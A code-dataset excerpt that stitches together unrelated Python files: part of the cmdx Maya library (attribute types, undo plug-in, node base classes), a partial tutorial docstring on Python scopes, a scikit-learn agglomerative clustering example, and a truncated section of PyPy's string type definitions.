self.Fn.setMax(self["max"])
if self["label"] is not None:
self.Fn.setNiceNameOverride(self["label"])
return self["mobject"]
def read(self, data):
pass
class Enum(_AbstractAttribute):
Fn = om.MFnEnumAttribute()
Type = None
Default = 0
Keyable = True
def __init__(self, name, fields=None, default=0, label=None, **kwargs):
super(Enum, self).__init__(name, default, label, **kwargs)
self.update({
"fields": fields or (name,),
})
def create(self, cls=None):
attr = super(Enum, self).create(cls)
for index, field in enumerate(self["fields"]):
self.Fn.addField(field, index)
return attr
def read(self, data):
return data.inputValue(self["mobject"]).asShort()
class Divider(Enum):
"""Visual divider in channel box"""
def __init__(self, label, **kwargs):
kwargs.pop("name", None)
kwargs.pop("fields", None)
kwargs.pop("label", None)
super(Divider, self).__init__(label, fields=(label,), label=" ", **kwargs)
class String(_AbstractAttribute):
Fn = om.MFnTypedAttribute()
Type = om.MFnData.kString
Default = ""
def default(self, cls=None):
default = str(super(String, self).default(cls))
return om.MFnStringData().create(default)
def read(self, data):
return data.inputValue(self["mobject"]).asString()
class Message(_AbstractAttribute):
Fn = om.MFnMessageAttribute()
Type = None
Default = None
Storable = False
class Matrix(_AbstractAttribute):
Fn = om.MFnMatrixAttribute()
Default = (0.0,) * 4 * 4 # Identity matrix
Array = False
Readable = True
Keyable = False
Hidden = False
def default(self, cls=None):
return None
def read(self, data):
return data.inputValue(self["mobject"]).asMatrix()
class Long(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kLong
Default = 0
def read(self, data):
return data.inputValue(self["mobject"]).asLong()
class Double(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kDouble
Default = 0.0
def read(self, data):
return data.inputValue(self["mobject"]).asDouble()
class Double3(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = None
Default = (0.0,) * 3
def default(self, cls=None):
if self["default"] is not None:
default = self["default"]
# Support single-value default
if not isinstance(default, (tuple, list)):
default = (default,) * 3
elif cls is not None:
default = cls.defaults.get(self["name"], self.Default)
else:
default = self.Default
children = list()
for index, child in enumerate("XYZ"):
attribute = self.Fn.create(self["name"] + child,
self["shortName"] + child,
om.MFnNumericData.kDouble,
default[index])
children.append(attribute)
return children
def read(self, data):
return data.inputValue(self["mobject"]).asDouble3()
class Boolean(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kBoolean
Default = True
def read(self, data):
return data.inputValue(self["mobject"]).asBool()
class AbstractUnit(_AbstractAttribute):
Fn = om.MFnUnitAttribute()
Default = 0.0
Min = None
Max = None
SoftMin = None
SoftMax = None
class Angle(AbstractUnit):
def default(self, cls=None):
default = super(Angle, self).default(cls)
# When no unit was explicitly passed, assume degrees
if not isinstance(default, om.MAngle):
default = om.MAngle(default, om.MAngle.kDegrees)
return default
class Time(AbstractUnit):
def default(self, cls=None):
default = super(Time, self).default(cls)
# When no unit was explicitly passed, assume seconds
if not isinstance(default, om.MTime):
default = om.MTime(default, om.MTime.kSeconds)
return default
class Distance(AbstractUnit):
def default(self, cls=None):
default = super(Distance, self).default(cls)
# When no unit was explicitly passed, assume centimeters
if not isinstance(default, om.MDistance):
default = om.MDistance(default, om.MDistance.kCentimeters)
return default
class Compound(_AbstractAttribute):
Fn = om.MFnCompoundAttribute()
Multi = None
def __init__(self, name, children=None, **kwargs):
if not children and self.Multi:
default = kwargs.pop("default", None)
children, Type = self.Multi
children = tuple(
Type(name + child, default=default[index], **kwargs)
if default else Type(name + child, **kwargs)
for index, child in enumerate(children)
)
self["children"] = children
else:
self["children"] = children
super(Compound, self).__init__(name, **kwargs)
def default(self, cls=None):
# Compound itself has no defaults, only it's children do
pass
def create(self, cls=None):
mobj = super(Compound, self).create(cls)
default = super(Compound, self).default(cls)
for index, child in enumerate(self["children"]):
# Forward attributes from parent to child
for attr in ("storable",
"readable",
"writable",
"hidden",
"channelBox",
"keyable",
"array"):
child[attr] = self[attr]
if child["default"] is None and default is not None:
child["default"] = default[index]
self.Fn.addChild(child.create(cls))
return mobj
def read(self, handle):
"""Read from MDataHandle"""
output = list()
for child in self["children"]:
child_handle = handle.child(child["mobject"])
output.append(child.read(child_handle))
return tuple(output)
class Double2(Compound):
Multi = ("XY", Double)
class Double4(Compound):
Multi = ("XYZW", Double)
class Angle2(Compound):
Multi = ("XY", Angle)
class Angle3(Compound):
Multi = ("XYZ", Angle)
class Distance2(Compound):
Multi = ("XY", Distance)
class Distance3(Compound):
Multi = ("XYZ", Distance)
class Distance4(Compound):
Multi = ("XYZW", Distance)
# Convenience aliases, for when it isn't clear e.g. `Matrix()`
# is referring to an attribute rather than the datatype.
EnumAttribute = Enum
DividerAttribute = Divider
StringAttribute = String
MessageAttribute = Message
MatrixAttribute = Matrix
LongAttribute = Long
DoubleAttribute = Double
Double3Attribute = Double3
BooleanAttribute = Boolean
AbstractUnitAttribute = AbstractUnit
AngleAttribute = Angle
TimeAttribute = Time
DistanceAttribute = Distance
CompoundAttribute = Compound
Double2Attribute = Double2
Double4Attribute = Double4
Angle2Attribute = Angle2
Angle3Attribute = Angle3
Distance2Attribute = Distance2
Distance3Attribute = Distance3
Distance4Attribute = Distance4
# --------------------------------------------------------
#
# Undo/Redo Support
#
# NOTE: Localised version of apiundo.py 0.2.0
# https://github.com/mottosso/apiundo
#
# In Maya, history is maintained by "commands". Each command is an instance of
# MPxCommand that encapsulates a series of API calls coupled with their
# equivalent undo/redo API calls. For example, the `createNode` command
# is presumably coupled with `cmds.delete`, `setAttr` is presumably
# coupled with another `setAttr` with the previous values passed in.
#
# Thus, creating a custom command involves subclassing MPxCommand and
# implementing coupling your do, undo and redo into one neat package.
#
# cmdx however doesn't fit into this framework.
#
# With cmdx, you call upon API calls directly. There is little to no
# correlation between each of your calls, which is great for performance
# but not so great for conforming to the undo/redo framework set forth
# by Autodesk.
#
# To work around this, without losing out on performance or functionality,
# a generic command is created, capable of hosting arbitrary API calls
# and storing them in the Undo/Redo framework.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.delete(node))
#
# Now when you go to undo, the `lambda` is called. It is then up to you
# the developer to ensure that what is being undone actually relates
# to what you wanted to have undone. For example, it is perfectly
# possible to add an unrelated call to history.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.setAttr(node + "translateX", 5))
#
# The result would be setting an attribute to `5` when attempting to undo.
#
# --------------------------------------------------------
# Support for multiple co-existing versions of apiundo.
# NOTE: This is important for vendoring, as otherwise a vendored apiundo
# could register e.g. cmds.apiUndo() first, causing a newer version
# to inadvertently use this older command (or worse yet, throwing an
# error when trying to register it again).
command = "_cmdxApiUndo_%s" % __version__.replace(".", "_")
# This module is both a Python module and Maya plug-in.
# Data is shared amongst the two through this "module"
name = "_cmdxShared_"
if name not in sys.modules:
sys.modules[name] = types.ModuleType(name)
shared = sys.modules[name]
shared.undo = None
shared.redo = None
shared.undos = {}
shared.redos = {}
def commit(undo, redo=lambda: None):
"""Commit `undo` and `redo` to history
Arguments:
undo (func): Call this function on next undo
redo (func, optional): Like `undo`, for for redo
"""
if not ENABLE_UNDO:
return
if not hasattr(cmds, command):
install()
# Precautionary measure.
# If this doesn't pass, odds are we've got a race condition.
# NOTE: This assumes calls to `commit` can only be done
# from a single thread, which should already be the case
# given that Maya's API is not threadsafe.
try:
assert shared.redo is None
assert shared.undo is None
except AssertionError:
log.debug("%s has a problem with undo" % __name__)
# Temporarily store the functions at shared-level,
# they are later picked up by the command once called.
shared.undo = "%x" % id(undo)
shared.redo = "%x" % id(redo)
shared.undos[shared.undo] = undo
shared.redos[shared.redo] = redo
# Let Maya know that something is undoable
getattr(cmds, command)()
def install():
"""Load this shared as a plug-in
Call this prior to using the shared
"""
if ENABLE_UNDO:
cmds.loadPlugin(__file__, quiet=True)
self.installed = True
def uninstall():
if ENABLE_UNDO:
# Plug-in may exist in undo queue and
# therefore cannot be unloaded until flushed.
cmds.flushUndo()
# Discard shared module
shared.undo = None
shared.redo = None
shared.undos.clear()
shared.redos.clear()
sys.modules.pop(name, None)
cmds.unloadPlugin(os.path.basename(__file__))
self.installed = False
def maya_useNewAPI():
pass
class _apiUndo(om.MPxCommand):
def doIt(self, args):
self.undo = shared.undo
self.redo = shared.redo
# Facilitate the above precautionary measure
shared.undo = None
shared.redo = None
def undoIt(self):
shared.undos[self.undo]()
def redoIt(self):
shared.redos[self.redo]()
def isUndoable(self):
# Without this, the above undoIt and redoIt will not be called
return True
def initializePlugin(plugin):
om.MFnPlugin(plugin).registerCommand(
command,
_apiUndo
)
def uninitializePlugin(plugin):
om.MFnPlugin(plugin).deregisterCommand(command)
# --------------------------------------------------------
#
# Commonly Node Types
#
# Creating a new node using a pre-defined Type ID is 10% faster
# than doing it using a string, but keeping all (~800) around
# has a negative impact on maintainability and readability of
# the project, so a balance is struck where only the most
# performance sensitive types are included here.
#
# Developers: See cmdt.py for a list of all available types and their IDs
#
# --------------------------------------------------------
tAddDoubleLinear = om.MTypeId(0x4441444c)
tAddMatrix = om.MTypeId(0x44414d58)
tAngleBetween = om.MTypeId(0x4e414254)
tBlendShape = om.MTypeId(0x46424c53)
tMultMatrix = om.MTypeId(0x444d544d)
tAngleDimension = om.MTypeId(0x4147444e)
tBezierCurve = om.MTypeId(0x42435256)
tCamera = om.MTypeId(0x4443414d)
tChoice = om.MTypeId(0x43484345)
tChooser = om.MTypeId(0x43484f4f)
tCondition = om.MTypeId(0x52434e44)
tMesh = om.MTypeId(0x444d5348)
tNurbsCurve = om.MTypeId(0x4e435256)
tNurbsSurface = om.MTypeId(0x4e535246)
tJoint = om.MTypeId(0x4a4f494e)
tTransform = om.MTypeId(0x5846524d)
tTransformGeometry = om.MTypeId(0x5447454f)
tWtAddMatrix = om.MTypeId(0x4457414d)
# --------------------------------------------------------
#
# Plug-ins
#
# --------------------------------------------------------
InstalledPlugins = dict()
TypeId = om.MTypeId
# Get your unique ID from Autodesk, the below
# should not be trusted for production.
StartId = int(os.getenv("CMDX_BASETYPEID", "0x12b9c0"), 0)
class MetaNode(type):
def __init__(cls, *args, **kwargs):
assert isinstance(cls.name, str)
assert isinstance(cls.defaults, dict)
assert isinstance(cls.attributes, list)
assert isinstance(cls.version, tuple)
if isinstance(cls.typeid, (int, float)):
cls.typeid = TypeId(cls.typeid)
# Support Divider plug-in, without name for readability.
# E.g. Divider("_", "Label") -> Divider("Label")
index = 1
for attribute in cls.attributes:
if isinstance(attribute, Divider):
attribute["name"] = "_" * index
attribute["shortName"] = "_" * index
index += 1
# Ensure no duplicates
assert len(set(cls.attributes)) == len(cls.attributes), (
"One or more attributes in '%s' was found more than once"
% cls.__name__
)
attributes = {attr["name"]: attr for attr in cls.attributes}
def findAttribute(self, name):
return attributes.get(name)
def findMObject(self, name):
return attributes.get(name)["mobject"]
def findPlug(self, node, name):
try:
mobj = attributes.get(name)["mobject"]
return om.MPlug(node, mobj)
except KeyError:
return None
cls.findAttribute = findAttribute
cls.findMObject = findMObject
cls.findPlug = findPlug
cls.find_attribute = findAttribute
cls.find_mobject = findMObject
cls.find_plug = findPlug
cls.log = logging.getLogger(cls.__name__)
return super(MetaNode, cls).__init__(*args, **kwargs)
@add_metaclass(MetaNode)
class DgNode(om.MPxNode):
"""Abstract baseclass for a Maya DG node
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@add_metaclass(MetaNode)
class SurfaceShape(om.MPxSurfaceShape):
"""Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@classmethod
def uiCreator(cls):
pass
@add_metaclass(MetaNode)
class SurfaceShapeUI(omui.MPxSurfaceShapeUI):
"""Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@add_metaclass(MetaNode)
class LocatorNode(omui.MPxLocatorNode):
"""Abstract baseclass for a Maya locator
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
name = "defaultNode"
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
def initialize2(Plugin):
def _nodeInit():
nameToAttr = {}
for attr in Plugin.attributes:
mattr = attr.create(Plugin)
Plugin.addAttribute(mattr)
nameToAttr[attr["name"]] = mattr
for src, dst in Plugin.affects:
log.debug("'%s' affects '%s'" % (src, dst))
Plugin.attributeAffects(nameToAttr[src], nameToAttr[dst])
def _nodeCreator():
return Plugin()
def initializePlugin(obj):
version = ".".join(map(str, Plugin.version))
plugin = om.MFnPlugin(obj, "Cmdx", version, "Any")
try:
if issubclass(Plugin, LocatorNode):
plugin.registerNode(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit,
om.MPxNode.kLocatorNode,
Plugin.classification)
elif issubclass(Plugin, DgNode):
plugin.registerNode(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit)
elif issubclass(Plugin, SurfaceShape):
plugin.registerShape(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit,
Plugin.uiCreator,
Plugin.classification)
else:
raise TypeError("Unsupported subclass: '%s'" % Plugin)
except Exception:
raise
else:
# Maintain reference to original class
InstalledPlugins[Plugin.name] = Plugin
Plugin.postInitialize()
return initializePlugin
def uninitialize2(Plugin):
def uninitializePlugin(obj):
om.MFnPlugin(obj).deregisterNode(Plugin.typeid)
return uninitializePlugin
# Plugins written with Maya Python API 1.0
class MPxManipContainer1(ompx1.MPxManipContainer):
name = "defaultManip"
version = (0, 0)
ownerid = om1.MTypeId(StartId)
typeid = om1.MTypeId(StartId)
def initializeManipulator1(Manipulator):
def _manipulatorCreator():
return ompx1.asMPxPtr(Manipulator())
def _manipulatorInit():
ompx1.MPxManipContainer.addToManipConnectTable(Manipulator.ownerid)
ompx1.MPxManipContainer.initialize()
def initializePlugin(obj):
version = ".".join(map(str, Manipulator.version))
plugin = ompx1.MFnPlugin(obj, "Cmdx", version, "Any")
# NOTE(marcus): The name *must* end with Manip
# See https://download.autodesk.com/us/maya/2011help
# /API/class_m_px_manip_container.html
# #e95527ff30ae53c8ae0419a1abde8b0c
assert Manipulator.name.endswith("Manip"), (
"Manipulator '%s' must have the name of a plug-in, "
"and end with 'Manip'"
)
plugin.registerNode(
Manipulator.name,
Manipulator.typeid,
_manipulatorCreator,
_manipulatorInit,
ompx1.MPxNode.kManipContainer
)
return initializePlugin
def uninitializeManipulator1(Manipulator):
def uninitializePlugin(obj):
ompx1.MFnPlugin(obj).deregisterNode(Manipulator.typeid)
return uninitializePlugin
def findPlugin(name):
"""Find the original class of a plug-in by `name`"""
try:
return InstalledPlugins[name]
except KeyError:
raise ExistError("'%s' is not a recognised plug-in" % name)
# --------------------------
#
# Callback Manager
#
# --------------------------
class Callback(object):
"""A Maya callback"""
log = logging.getLogger("cmdx.Callback")
def __init__(self, name, installer, args, api=2, help="", parent=None):
self._id = None
self._args = args
self._name = name
self._installer = installer
self._help = help
# Callbacks are all uninstalled using the same function
# relative either API 1.0 or 2.0
self._uninstaller = {
1: om1.MMessage.removeCallback,
2: om.MMessage.removeCallback
}[api]
def __del__(self):
self.deactivate()
def name(self):
return self._name
def help(self):
return self._help
def is_active(self):
return self._id is not None
def activate(self):
self.log.debug("Activating callback '%s'.." % self._name)
if self.is_active():
self.log.debug("%s already active, ignoring" % self._name)
return
self._id = self._installer(*self._args)
def deactivate(self):
self.log.debug("Deactivating callback '%s'.." % self._name)
if self.is_active():
self._uninstaller(self._id)
self._id = None
class CallbackGroup(list):
"""Multiple callbacks rolled into one"""
def __init__(self, name, callbacks, parent=None):
self._name = name
self[:] = callbacks
def name(self):
return self._name
def add(self, name, installer, args, api=2):
"""Convenience method for .append(Callback())"""
callback = Callback(name, installer, args, api)
self.append(callback)
def activate(self):
for callback in self._callbacks:
callback.activate()
def deactivate(self):
for callback in self._callbacks:
callback.deactivate()
# ----------------------
#
# Cache Manager
#
# ----------------------
class Cache(object):
def __init__(self):
self._values = {}
def clear(self, node=None):
pass
def read(self, node, attr, time):
pass
def transform(self, node):
pass
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| 27.488901 | 84 | 0.553472 | [
"BSD-2-Clause"
] | fvbehr/cmdx | cmdx.py | 154,791 | Python |
""" Global and local Scopes
Scopes and Namespaces
When an object is assigned to a variable # a = 10
that variable points to some object
and we say that the variable (name) is bound to that object
That object can be accessed using that name in various parts of our code
# ### I can't reference that (a) just anywhere in my code!
That variable name and it's binding (name and object) only "exist" in specific parts of our code
The porton of code where that name/binding is defined, is called the lexical scope of the variable
These bindings are stored in namespaces
(each scope has its own namespace)
The global scope
The global scope is essentially the module scope
It spans a single file only
There is no concept of a truly global (across all the modules in our app) scope in Python
The only exception to this are some of the built=in globally available objects, such as:
True False None dict print
The built-in global variables can be used anywhere inside our module
including inside any function
Global scopes are nested inside the built-in scope
Built-in Scope
Module 1 name spaces
Scope name var1 0xA345E
space func1 0xFF34A
Module 2
Scope name
space
If I reference a variable name inside a scope and Python does ot find it in that scope's namespace
Examples
module1.py Python does not find True or print in the current (module/global) scope
print(True) So, it looks for them in the enclosing scope -> build-in
Finds them there -> True
module2.py Python does not find a or print in the current (module/global) scope
print(a) So
""" | 29.707692 | 102 | 0.626618 | [
"Unlicense"
] | minefarmer/deep-Dive-1 | .history/my_classes/ScopesClosuresAndDecorators/GlobalLocalScopes_20210709212514.py | 1,931 | Python |
"""
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| 33.608696 | 77 | 0.614166 | [
"BSD-3-Clause"
] | 09sachin/scikit-learn | examples/cluster/plot_digits_linkage.py | 3,092 | Python |
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.sharesmallstr:
if space.config.objspace.std.withprebuiltchar:
# share characters and empty string
if len(s) <= 1:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
else:
s = s[0] # annotator hint: a single char
return wrapchar(space, s)
else:
# only share the empty string
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(s))
return W_StringObject(s)
def wrapchar(space, c):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.withprebuiltchar:
if space.config.objspace.std.withrope:
return W_RopeObject.PREBUILT[ord(c)]
return W_StringObject.PREBUILT[ord(c)]
else:
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(c))
return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
assert start >= 0
assert stop >= 0
assert not space.config.objspace.std.withrope
if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
return orig_obj
if space.config.objspace.std.withstrslice:
from pypy.objspace.std.strsliceobject import W_StringSliceObject
# XXX heuristic, should be improved!
if (stop - start) > len(s) * 0.20 + 40:
return W_StringSliceObject(s, start, stop)
return wrapstr(space, s[start:stop])
def joined(space, strlist):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject(strlist)
else:
return wrapstr(space, "".join(strlist))
def joined2(space, str1, str2):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject([str1, str2])
else:
return wrapstr(space, str1 + str2)
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
